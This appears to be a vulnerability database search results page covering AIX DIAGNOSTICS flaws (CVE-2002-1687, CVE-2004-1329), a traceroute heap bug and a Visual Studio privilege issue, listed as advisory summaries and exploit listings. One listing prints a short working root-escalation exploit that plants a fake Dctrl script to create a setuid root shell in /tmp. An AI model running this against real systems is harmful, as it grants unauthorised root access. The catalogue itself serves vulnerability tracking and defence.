Lucene search
K

1850 matches found

Cvelist
Cvelist
added 2005/06/21 4:0 a.m.21 views

CVE-2002-1687

Buffer overflow in the diagnostics library in AIX allows local users to "cause data and instructions to be overwritten" via a long DIAGNOSTICS environment variable...

6.5AI score0.00291EPSS
Exploits0References1
CVE
CVE
added 2005/06/21 4:0 a.m.47 views

CVE-2002-1687

CVE-2002-1687 describes a local buffer overflow in the AIX diagnostics library triggered by a long DIAGNOSTICS environment variable. Multiple sources (NVD, Red Hat, CVE list, NVD mirrors) corroborate that a local attacker could cause data and instructions to be overwritten. The impact is limited ...

2.1CVSS6.9AI score0.00291EPSS
Exploits0References1Affected Software1
Cvelist
Cvelist
added 2005/01/06 5:0 a.m.32 views

CVE-2004-1329

Untrusted execution path vulnerability in the diag commands 1 lsmcode, 2 diagexec, 3 invscout, and 4 invscoutd in AIX 5.1 through 5.3 allows local users to execute arbitrary programs by modifying the DIAGNOSTICS environment variable to point to a malicious Dctrl program...

7.1AI score0.03273EPSS
Exploits2References8
exploitpack
exploitpack
added 2004/12/21 12:0 a.m.9 views

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

1.7AI score
Exploits0
canvas
canvas
added 2004/12/20 5:0 a.m.70 views

Immunity Canvas: CVE_2004_1329

Name| CVE20041329 ---|--- CVE| CVE-2004-1329 Exploit Pack| CANVAS Description| CVE-2004-1329: DIAGNOSTICS environment handling Notes| CVE Name: CVE-2004-1329 VENDOR: IBM VersionsAffected: 5.X Repeatability: unlimited CVE URL: https://vulners.com/cve/CVE-2004-1329 CVSS: 7.2...

7.2CVSS6.3AI score0.03273EPSS
Exploits2
NVD
NVD
added 2004/12/20 5:0 a.m.23 views

CVE-2004-1329

Untrusted execution path vulnerability in the diag commands 1 lsmcode, 2 diagexec, 3 invscout, and 4 invscoutd in AIX 5.1 through 5.3 allows local users to execute arbitrary programs by modifying the DIAGNOSTICS environment variable to point to a malicious Dctrl program...

7.2CVSS7.1AI score0.03273EPSS
Exploits2References8
Exploit DB
Exploit DB
added 2004/12/20 12:0 a.m.47 views

IBM AIX 5.x - 'Diag' Local Privilege Escalation

source: https://www.securityfocus.com/bid/12041/info diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment...

7.4AI score
Exploits0
NVD
NVD
added 2002/12/31 5:0 a.m.20 views

CVE-2002-1687

Buffer overflow in the diagnostics library in AIX allows local users to "cause data and instructions to be overwritten" via a long DIAGNOSTICS environment variable...

2.1CVSS6.5AI score0.00291EPSS
Exploits0References1
Exploit DB
Exploit DB
added 2000/09/28 12:0 a.m.37 views

LBL Traceroute 1.4 a5 - Heap Corruption (2)

// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL tracerou...

7.4AI score
Exploits0
Microsoft Security Update
Microsoft Security Update
added 1970/01/01 12:0 a.m.43 views

Security update for the Diagnostic Hub Standard Collector elevation of privilege vulnerability in Visual Studio 2015 Update 3 (KB4576950)

An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles file and data operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context...

3.1AI score
Exploits0
Rows per page
Query Builder